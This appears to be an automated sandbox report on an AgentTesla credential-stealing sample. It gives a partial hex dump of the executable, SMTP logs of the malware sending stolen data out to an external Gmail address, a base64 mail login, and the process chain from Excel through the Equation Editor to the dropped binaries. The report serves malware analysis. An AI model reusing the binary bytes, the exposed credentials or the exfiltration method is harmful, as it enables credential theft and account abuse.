                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8c 35 4c ea 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 88 0b 00 00 08 00 00 00 00 00 00 da a6 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 a6 0b 00 4f 00 00 00 00 c0 0b 00 b4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0b 00 0c 00 00 00 6c a6 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 86 0b 00 00 20 00 00 00 88 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b4 05 00 00 00 c0 0b 00 00 06 00 00 00 8a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0b 00 00 02 00 00 00 90 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc a6 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 fc 65 00 00 d8 7e 00 00 03 00 00 00 76 00 00 06 d4 e4 00 00 98 c1 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 01 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 11 00 00 70 0a 2b 00 06 2a 22 02 28 1f 00 00 0a 00 2a 13 30 04 00 43 00 00 00 02 00 00 11 00 28 4c 00 00 06 26 12 01 fe 15 0b 00 00 02 12 01 0f 02 28 20 00 00 0a 68 7d c4 00 00 04 12 01 0f 02 28 21 00 00 0a 68 7d c5 00 00 04 07 0a 02 28 22 00 00 0a 20 a1 00 00 00 03 06 28 56 00 00 06 26 2a 3e 00 02 03 28 23 00 00 0a 28 04 00 00 06 00 2a 00 13 30 04 00 43 00 00 00 02 00 00 11 00 28 4c 00 00 06 26 12 01 fe 15 0b 00 00 02 12 01 0f 02 28 20 00 00 0a 68 7d c4 00 00 04 12 01 0f 02 28 21 00 00 0a 68 7d c5 00 00 04 07 0a 02 28 22 00 00 0a 20 a2 00 00 00 03 06 28 56 00 00 06 26 2a 3e 00 02 03 28 23 00 00 0a 28 06 00 00 06 00 2a 00 13 30 06 00 32 00 00 00 03 00 00 11 00 02 03 28 24 00 00 0a 00 02 28 25 00 00 0a 16 fe 01 0a 06 2c 1b 02 02 28 22 00 00 0a 16 16 02 28 26 00 00 0a 02 28 27 00 00 0a 28 0d 00 00 06 00 2a 3e 00 02 03 28 23 00 00 0a 28 0b 00 00 06 00 2a 00 00 13 30 03 00 0d 00 00 00 04 00 00 11 00 02 d1 03 1f 10 62 60 0a 2b 00 06 2a a6 00 02 28 22 00 00 0a 20 13 03 00 00 16 0f 02 28 20 00 00 0a 68 0f 02 28 21 00 00 0a 68 28 0a 00 00 06 28 51 00 00 06 26 2a 00 13 30 02 00 a3 00 00 00 05 00 00 11 00 02 28 25 00 00 0a 0a 06 2c 0e 00 02 03 28 28 00 00 0a 00 38 89 00 00 00 03 28 29 00 00 0a 0c 08 0b 07 1f 47 30 0e 07 1f 0c 2e 52 2b 00 07 1f 47 2e 56 2b 62 07 20 83 00 00 00 59 45 04 00 00 00 0c 00 00 00 46 00 00 00 17 00 00 00 22 00 00 00 2b 00 07 20 ae 00
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5L0 @ @Ol H.text `.rsrc@@.reloc@BHe~v0rp+*0rp+*"(*0C(L&( h}(!h}(" (V&*>(#(*0C(L&( h}(!h}(" (V&*>(#(*02($(%,("(&('(*>(#(*0b`+*(" ( h(!h((Q&*0(%,((8()G0.R+G.V+b YEF"+


                                            SMTP Packets

                                            TimestampSource PortDest PortSource IPDest IPCommands
                                            May 13, 2021 03:23:03.997697115 CEST58749168162.241.85.66192.168.2.22220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:23:03 +0000
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            May 13, 2021 03:23:03.998275042 CEST49168587192.168.2.22162.241.85.66EHLO 841675
                                            May 13, 2021 03:23:04.158545017 CEST58749168162.241.85.66192.168.2.22250-sh002.bigrock.com Hello 841675 [84.17.52.78]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPE_CONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            May 13, 2021 03:23:04.160448074 CEST49168587192.168.2.22162.241.85.66AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
                                            May 13, 2021 03:23:04.320734978 CEST58749168162.241.85.66192.168.2.22334 UGFzc3dvcmQ6
                                            May 13, 2021 03:23:04.484436989 CEST58749168162.241.85.66192.168.2.22235 Authentication succeeded
                                            May 13, 2021 03:23:04.499161959 CEST58749168162.241.85.66192.168.2.22421 sh002.bigrock.com lost input connection
                                            May 13, 2021 03:23:10.083399057 CEST58749169162.241.85.66192.168.2.22220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:23:10 +0000
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            May 13, 2021 03:23:10.085772991 CEST49169587192.168.2.22162.241.85.66EHLO 841675
                                            May 13, 2021 03:23:10.246397018 CEST58749169162.241.85.66192.168.2.22250-sh002.bigrock.com Hello 841675 [84.17.52.78]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPE_CONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            May 13, 2021 03:23:10.248018026 CEST49169587192.168.2.22162.241.85.66AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
                                            May 13, 2021 03:23:10.408878088 CEST58749169162.241.85.66192.168.2.22334 UGFzc3dvcmQ6
                                            May 13, 2021 03:23:10.571176052 CEST58749169162.241.85.66192.168.2.22235 Authentication succeeded
                                            May 13, 2021 03:23:10.573822975 CEST49169587192.168.2.22162.241.85.66MAIL FROM:<sales@orienttech.com.qa>
                                            May 13, 2021 03:23:10.734144926 CEST58749169162.241.85.66192.168.2.22250 OK
                                            May 13, 2021 03:23:10.734493971 CEST49169587192.168.2.22162.241.85.66RCPT TO:<pdsctsops@gmail.com>
                                            May 13, 2021 03:23:10.920496941 CEST58749169162.241.85.66192.168.2.22250 Accepted
                                            May 13, 2021 03:23:10.920703888 CEST49169587192.168.2.22162.241.85.66DATA
                                            May 13, 2021 03:23:11.082185030 CEST58749169162.241.85.66192.168.2.22354 Enter message, ending with "." on a line by itself
                                            May 13, 2021 03:23:18.615981102 CEST58749170162.241.85.66192.168.2.22220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:23:18 +0000
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            May 13, 2021 03:23:18.617187023 CEST49170587192.168.2.22162.241.85.66EHLO 841675
                                            May 13, 2021 03:23:18.774024963 CEST58749170162.241.85.66192.168.2.22250-sh002.bigrock.com Hello 841675 [84.17.52.78]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPE_CONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            May 13, 2021 03:23:18.774563074 CEST49170587192.168.2.22162.241.85.66AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
                                            May 13, 2021 03:23:18.931521893 CEST58749170162.241.85.66192.168.2.22334 UGFzc3dvcmQ6
                                            May 13, 2021 03:23:19.090646029 CEST58749170162.241.85.66192.168.2.22235 Authentication succeeded
                                            May 13, 2021 03:23:19.091041088 CEST49170587192.168.2.22162.241.85.66MAIL FROM:<sales@orienttech.com.qa>
                                            May 13, 2021 03:23:19.247781992 CEST58749170162.241.85.66192.168.2.22250 OK
                                            May 13, 2021 03:23:19.248249054 CEST49170587192.168.2.22162.241.85.66RCPT TO:<pdsctsops@gmail.com>
                                            May 13, 2021 03:23:19.424469948 CEST58749170162.241.85.66192.168.2.22250 Accepted
                                            May 13, 2021 03:23:19.424809933 CEST49170587192.168.2.22162.241.85.66DATA
                                            May 13, 2021 03:23:19.582461119 CEST58749170162.241.85.66192.168.2.22354 Enter message, ending with "." on a line by itself
                                            May 13, 2021 03:23:20.571885109 CEST49170587192.168.2.22162.241.85.66.
                                            May 13, 2021 03:23:20.731383085 CEST58749170162.241.85.66192.168.2.22250 OK id=1lh04N-003kua-Gf
                                            May 13, 2021 03:23:27.737900019 CEST49170587192.168.2.22162.241.85.66QUIT
                                            May 13, 2021 03:23:27.895456076 CEST58749170162.241.85.66192.168.2.22221 sh002.bigrock.com closing connection
                                            May 13, 2021 03:23:28.547355890 CEST58749171162.241.85.66192.168.2.22220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:23:28 +0000
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            May 13, 2021 03:23:28.547905922 CEST49171587192.168.2.22162.241.85.66EHLO 841675
                                            May 13, 2021 03:23:28.708467007 CEST58749171162.241.85.66192.168.2.22250-sh002.bigrock.com Hello 841675 [84.17.52.78]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPE_CONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            May 13, 2021 03:23:28.709213972 CEST49171587192.168.2.22162.241.85.66AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
                                            May 13, 2021 03:23:28.870008945 CEST58749171162.241.85.66192.168.2.22334 UGFzc3dvcmQ6
                                            May 13, 2021 03:23:29.033612013 CEST58749171162.241.85.66192.168.2.22235 Authentication succeeded
                                            May 13, 2021 03:23:29.034157991 CEST49171587192.168.2.22162.241.85.66MAIL FROM:<sales@orienttech.com.qa>
                                            May 13, 2021 03:23:29.194521904 CEST58749171162.241.85.66192.168.2.22250 OK
                                            May 13, 2021 03:23:29.194818974 CEST49171587192.168.2.22162.241.85.66RCPT TO:<pdsctsops@gmail.com>
                                            May 13, 2021 03:23:29.377938032 CEST58749171162.241.85.66192.168.2.22250 Accepted
                                            May 13, 2021 03:23:29.378381968 CEST49171587192.168.2.22162.241.85.66DATA
                                            May 13, 2021 03:23:29.538724899 CEST58749171162.241.85.66192.168.2.22354 Enter message, ending with "." on a line by itself
                                            May 13, 2021 03:23:30.554898977 CEST58749171162.241.85.66192.168.2.22250 OK id=1lh04X-003l25-FA
                                            May 13, 2021 03:23:34.591773987 CEST58749172162.241.85.66192.168.2.22220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:23:34 +0000
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            May 13, 2021 03:23:34.592497110 CEST49172587192.168.2.22162.241.85.66EHLO 841675
                                            May 13, 2021 03:23:34.752564907 CEST58749172162.241.85.66192.168.2.22250-sh002.bigrock.com Hello 841675 [84.17.52.78]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPE_CONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            May 13, 2021 03:23:34.753225088 CEST49172587192.168.2.22162.241.85.66AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
                                            May 13, 2021 03:23:34.913440943 CEST58749172162.241.85.66192.168.2.22334 UGFzc3dvcmQ6
                                            May 13, 2021 03:23:35.075247049 CEST58749172162.241.85.66192.168.2.22235 Authentication succeeded
                                            May 13, 2021 03:23:35.076103926 CEST49172587192.168.2.22162.241.85.66MAIL FROM:<sales@orienttech.com.qa>
                                            May 13, 2021 03:23:35.235919952 CEST58749172162.241.85.66192.168.2.22250 OK
                                            May 13, 2021 03:23:35.236738920 CEST49172587192.168.2.22162.241.85.66RCPT TO:<pdsctsops@gmail.com>
                                            May 13, 2021 03:23:35.414937973 CEST58749172162.241.85.66192.168.2.22250 Accepted
                                            May 13, 2021 03:23:35.415452003 CEST49172587192.168.2.22162.241.85.66DATA
                                            May 13, 2021 03:23:35.575618029 CEST58749172162.241.85.66192.168.2.22354 Enter message, ending with "." on a line by itself
                                            May 13, 2021 03:23:36.588289976 CEST49172587192.168.2.22162.241.85.66.
                                            May 13, 2021 03:23:36.751983881 CEST58749172162.241.85.66192.168.2.22250 OK id=1lh04d-003l62-GN
                                            May 13, 2021 03:23:46.254163980 CEST58749173162.241.85.66192.168.2.22220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:23:46 +0000
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            May 13, 2021 03:23:46.254576921 CEST49173587192.168.2.22162.241.85.66EHLO 841675
                                            May 13, 2021 03:23:46.412447929 CEST58749173162.241.85.66192.168.2.22250-sh002.bigrock.com Hello 841675 [84.17.52.78]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPE_CONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            May 13, 2021 03:23:46.413131952 CEST49173587192.168.2.22162.241.85.66AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
                                            May 13, 2021 03:23:46.572596073 CEST58749173162.241.85.66192.168.2.22334 UGFzc3dvcmQ6
                                            May 13, 2021 03:23:46.732511044 CEST58749173162.241.85.66192.168.2.22235 Authentication succeeded
                                            May 13, 2021 03:23:46.735352993 CEST49173587192.168.2.22162.241.85.66MAIL FROM:<sales@orienttech.com.qa>
                                            May 13, 2021 03:23:46.891623020 CEST58749173162.241.85.66192.168.2.22250 OK
                                            May 13, 2021 03:23:46.892031908 CEST49173587192.168.2.22162.241.85.66RCPT TO:<pdsctsops@gmail.com>
                                            May 13, 2021 03:23:47.073494911 CEST58749173162.241.85.66192.168.2.22250 Accepted
                                            May 13, 2021 03:23:47.073843956 CEST49173587192.168.2.22162.241.85.66DATA
                                            May 13, 2021 03:23:47.231632948 CEST58749173162.241.85.66192.168.2.22354 Enter message, ending with "." on a line by itself
                                            May 13, 2021 03:23:47.272505045 CEST58749173162.241.85.66192.168.2.22421 Lost incoming connection
                                            May 13, 2021 03:23:53.245213985 CEST58749174162.241.85.66192.168.2.22220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:23:53 +0000
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            May 13, 2021 03:23:53.245516062 CEST49174587192.168.2.22162.241.85.66EHLO 841675
                                            May 13, 2021 03:23:53.402441978 CEST58749174162.241.85.66192.168.2.22250-sh002.bigrock.com Hello 841675 [84.17.52.78]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPE_CONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            May 13, 2021 03:23:53.402909040 CEST49174587192.168.2.22162.241.85.66AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
                                            May 13, 2021 03:23:53.559551954 CEST58749174162.241.85.66192.168.2.22334 UGFzc3dvcmQ6
                                            May 13, 2021 03:23:53.717236996 CEST58749174162.241.85.66192.168.2.22235 Authentication succeeded
                                            May 13, 2021 03:23:53.717570066 CEST49174587192.168.2.22162.241.85.66MAIL FROM:<sales@orienttech.com.qa>
                                            May 13, 2021 03:23:53.873570919 CEST58749174162.241.85.66192.168.2.22250 OK
                                            May 13, 2021 03:23:53.874008894 CEST49174587192.168.2.22162.241.85.66RCPT TO:<pdsctsops@gmail.com>
                                            May 13, 2021 03:23:54.054264069 CEST58749174162.241.85.66192.168.2.22250 Accepted
                                            May 13, 2021 03:23:54.054610014 CEST49174587192.168.2.22162.241.85.66DATA
                                            May 13, 2021 03:23:54.210964918 CEST58749174162.241.85.66192.168.2.22354 Enter message, ending with "." on a line by itself
                                            May 13, 2021 03:23:55.206312895 CEST49174587192.168.2.22162.241.85.66.
                                            May 13, 2021 03:23:55.365861893 CEST58749174162.241.85.66192.168.2.22250 OK id=1lh04w-003lMD-4j
                                            May 13, 2021 03:24:01.208173037 CEST49174587192.168.2.22162.241.85.66QUIT
                                            May 13, 2021 03:24:01.367203951 CEST58749174162.241.85.66192.168.2.22221 sh002.bigrock.com closing connection
                                            May 13, 2021 03:24:04.110459089 CEST58749175162.241.85.66192.168.2.22220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:24:04 +0000
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            May 13, 2021 03:24:04.110891104 CEST49175587192.168.2.22162.241.85.66EHLO 841675
                                            May 13, 2021 03:24:04.272001982 CEST58749175162.241.85.66192.168.2.22250-sh002.bigrock.com Hello 841675 [84.17.52.78]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPE_CONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            May 13, 2021 03:24:04.272419930 CEST49175587192.168.2.22162.241.85.66AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
                                            May 13, 2021 03:24:04.437010050 CEST58749175162.241.85.66192.168.2.22334 UGFzc3dvcmQ6
                                            May 13, 2021 03:24:04.599860907 CEST58749175162.241.85.66192.168.2.22235 Authentication succeeded
                                            May 13, 2021 03:24:04.600142002 CEST49175587192.168.2.22162.241.85.66MAIL FROM:<sales@orienttech.com.qa>
                                            May 13, 2021 03:24:04.760809898 CEST58749175162.241.85.66192.168.2.22250 OK
                                            May 13, 2021 03:24:04.761053085 CEST49175587192.168.2.22162.241.85.66RCPT TO:<pdsctsops@gmail.com>
                                            May 13, 2021 03:24:04.940522909 CEST58749175162.241.85.66192.168.2.22250 Accepted
                                            May 13, 2021 03:24:04.940841913 CEST49175587192.168.2.22162.241.85.66DATA
                                            May 13, 2021 03:24:05.103980064 CEST58749175162.241.85.66192.168.2.22354 Enter message, ending with "." on a line by itself
                                            May 13, 2021 03:24:08.884320021 CEST58749176162.241.85.66192.168.2.22220-sh002.bigrock.com ESMTP Exim 4.94.2 #2 Thu, 13 May 2021 01:24:08 +0000
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            May 13, 2021 03:24:08.884543896 CEST49176587192.168.2.22162.241.85.66EHLO 841675
                                            May 13, 2021 03:24:09.040916920 CEST58749176162.241.85.66192.168.2.22250-sh002.bigrock.com Hello 841675 [84.17.52.78]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPE_CONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            May 13, 2021 03:24:09.041120052 CEST49176587192.168.2.22162.241.85.66AUTH login c2FsZXNAb3JpZW50dGVjaC5jb20ucWE=
                                            May 13, 2021 03:24:09.197319984 CEST58749176162.241.85.66192.168.2.22334 UGFzc3dvcmQ6
                                            May 13, 2021 03:24:09.354722023 CEST58749176162.241.85.66192.168.2.22235 Authentication succeeded
                                            May 13, 2021 03:24:09.354909897 CEST49176587192.168.2.22162.241.85.66MAIL FROM:<sales@orienttech.com.qa>
                                            May 13, 2021 03:24:09.510795116 CEST58749176162.241.85.66192.168.2.22250 OK
                                            May 13, 2021 03:24:09.511375904 CEST49176587192.168.2.22162.241.85.66RCPT TO:<pdsctsops@gmail.com>
                                            May 13, 2021 03:24:10.016205072 CEST49176587192.168.2.22162.241.85.66RCPT TO:<pdsctsops@gmail.com>
                                            May 13, 2021 03:24:10.086047888 CEST58749176162.241.85.66192.168.2.22250 Accepted
                                            May 13, 2021 03:24:10.086345911 CEST49176587192.168.2.22162.241.85.66DATA
                                            May 13, 2021 03:24:10.242222071 CEST58749176162.241.85.66192.168.2.22354 Enter message, ending with "." on a line by itself
                                            May 13, 2021 03:24:12.469890118 CEST49176587192.168.2.22162.241.85.66.
                                            May 13, 2021 03:24:12.628506899 CEST58749176162.241.85.66192.168.2.22250 OK id=1lh05C-003leg-5k

                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: EXCEL.EXE PID: 2408 Parent PID: 584

                                            General

                                            Start time:03:21:40
                                            Start date:13/05/2021
                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                            Imagebase:0x13f020000
                                            File size:27641504 bytes
                                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: EQNEDT32.EXE PID: 2608 Parent PID: 584

                                            General

                                            Start time:03:22:00
                                            Start date:13/05/2021
                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                            Imagebase:0x400000
                                            File size:543304 bytes
                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: joewealth28743.exe PID: 1980 Parent PID: 2608

                                            General

                                            Start time:03:22:01
                                            Start date:13/05/2021
                                            Path:C:\Users\user\AppData\Roaming\joewealth28743.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\joewealth28743.exe
                                            Imagebase:0xef0000
                                            File size:758272 bytes
                                            MD5 hash:0B4CC13DE8C54ADD5149B56649B3F680
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 49%, ReversingLabs
                                            Reputation:low

                                            Analysis Process: joewealth28743.exe PID: 2988 Parent PID: 1980

                                            General

                                            Start time:03:22:05
                                            Start date:13/05/2021
                                            Path:C:\Users\user\AppData\Roaming\joewealth28743.exe
                                            Wow64 process (32bit):true
                                            Commandline:{path}
                                            Imagebase:0xef0000
                                            File size:758272 bytes
                                            MD5 hash:0B4CC13DE8C54ADD5149B56649B3F680
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2353787746.000000000278B000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2353787746.000000000278B000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2353745503.0000000002723000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            Analysis Process: Nwefile.exe PID: 2664 Parent PID: 1388

                                            General

                                            Start time:03:22:36
                                            Start date:13/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe'
                                            Imagebase:0x8b0000
                                            File size:758272 bytes
                                            MD5 hash:0B4CC13DE8C54ADD5149B56649B3F680
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 49%, ReversingLabs
                                            Reputation:low

                                            Analysis Process: Nwefile.exe PID: 1888 Parent PID: 2664

                                            General

                                            Start time:03:22:39
                                            Start date:13/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe
                                            Wow64 process (32bit):true
                                            Commandline:{path}
                                            Imagebase:0x8b0000
                                            File size:758272 bytes
                                            MD5 hash:0B4CC13DE8C54ADD5149B56649B3F680
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            Analysis Process: Nwefile.exe PID: 2768 Parent PID: 1388

                                            General

                                            Start time:03:22:44
                                            Start date:13/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe'
                                            Imagebase:0x8b0000
                                            File size:758272 bytes
                                            MD5 hash:0B4CC13DE8C54ADD5149B56649B3F680
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            Analysis Process: Nwefile.exe PID: 2792 Parent PID: 2768

                                            General

                                            Start time:03:22:47
                                            Start date:13/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe
                                            Wow64 process (32bit):true
                                            Commandline:{path}
                                            Imagebase:0x8b0000
                                            File size:758272 bytes
                                            MD5 hash:0B4CC13DE8C54ADD5149B56649B3F680
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp, Author: Joe Security
